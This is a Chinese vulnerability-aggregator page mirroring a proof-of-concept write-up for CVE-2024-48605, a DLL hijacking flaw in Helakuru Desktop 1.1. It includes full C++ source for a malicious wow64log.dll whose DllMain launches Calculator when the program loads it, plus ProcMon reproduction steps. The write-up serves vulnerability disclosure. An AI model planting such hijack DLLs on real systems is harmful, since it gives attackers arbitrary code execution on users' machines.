POC详情: 290bd1c52981777c7284eb32b1c9a88195c99378

来源
关联漏洞
标题: Helakuru 安全漏洞 (CVE-2024-48605)
描述:Helakuru是斯里兰卡Helakuru公司的一款 Android 键盘。 Helakuru v1.1版本存在安全漏洞,该漏洞源于没有对wow64log.dll文件进行适当的验证,本地攻击者可以执行任意代码。
描述
Helakuru Version 1.1 DLL Hijack - CVE-2024-48605
介绍
**DLL Hijacking Vulnerability in Helakuru**
---

**Summary**

The Helakuru Desktop version 1.1v operates on both 64-bit and 32-bit architectures. During testing, it was identified that the program attempts to load wow64log.dll, which is not included by default in modern Windows operating systems. This results in a 'Name not found' error, exposing the program to a DLL Hijacking vulnerability. By crafting a malicious wow64log.dll, arbitrary code execution can be achieved.

**Affected Version**

Helakuru Desktop 1.1v

**Steps to Reproduce**

1. Monitor DLL Loading with ProcMon
 * ProcMon showing the CreateFile operation with "Name not found" for wow64log.dll
   ![Pasted image 20240925232040](https://github.com/user-attachments/assets/e3f552d8-bb3c-4c61-87ef-8a1dd5fa9bf0)

2. Create a Malicious wow64log.dll
``` C++
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

3. Run Helakuru Desktop
 * Launch Helakuru Desktop again. The malicious wow64log.dll will now be loaded into the program, triggering the Calculator as a demonstration of successful DLL injection.
 ![Pasted image 20240925233737](https://github.com/user-attachments/assets/d01f179e-e09d-45e1-8b04-2922102f7b69)

4. Verify DLL Load using ProcMon
 * Reopen ProcMon and observe that the wow64log.dll is successfully loaded this time, confirming that the custom DLL has been executed by the program.
   ![Pasted image 20240925232728](https://github.com/user-attachments/assets/985f373f-9e7a-4d4b-b3d3-0bed98710be4)

**Impact**: This vulnerability allows for arbitrary code execution.


文件快照

[4.0K] /data/pocs/290bd1c52981777c7284eb32b1c9a88195c99378 ├── [1.0K] LICENSE └── [2.5K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。